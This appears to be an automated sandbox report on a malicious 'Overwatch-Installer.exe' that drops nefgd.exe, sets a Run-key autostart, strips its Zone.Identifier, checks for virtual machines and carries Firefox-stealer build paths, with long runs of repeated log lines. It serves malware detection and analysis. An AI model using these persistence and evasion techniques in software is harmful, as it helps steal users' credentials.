Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Overwatch-Installer.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: Overwatch-Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: Overwatch-Installer.exe, nefgd.exe.0.dr
Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox\obj\Debug\firefox.pdb source: Overwatch-Installer.exe, nefgd.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: Overwatch-Installer.exe, DJW.cs	.Net Code: FG System.Reflection.Assembly.Load(byte[])
Source: nefgd.exe.0.dr, DJW.cs	.Net Code: FG System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_066015A8 pushad ; retf	0_2_066015F9
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06B31D3B pushfd ; ret	3_2_06B31D3E
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C39E98 push eax; retf	3_2_06C39E99
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C30BE1 push ecx; ret	3_2_06C30BE2
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C30C57 push ecx; ret	3_2_06C30C58

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File created: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	File opened: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	File opened: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Moves itself to temp directory

Source: c:\users\user\desktop\overwatch-installer.exe

File moved: C:\Users\user\AppData\Local\Temp\tmpG571.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Overwatch-Installer.exe PID: 7160, type: MEMORYSTR

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Memory allocated: 1620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Memory allocated: 5110000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 18E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 3630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 5630000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 79430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 2B00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 4B00000 memory commit \| memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Code function: 3_2_06B33427 str word ptr [edi]

3_2_06B33427

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

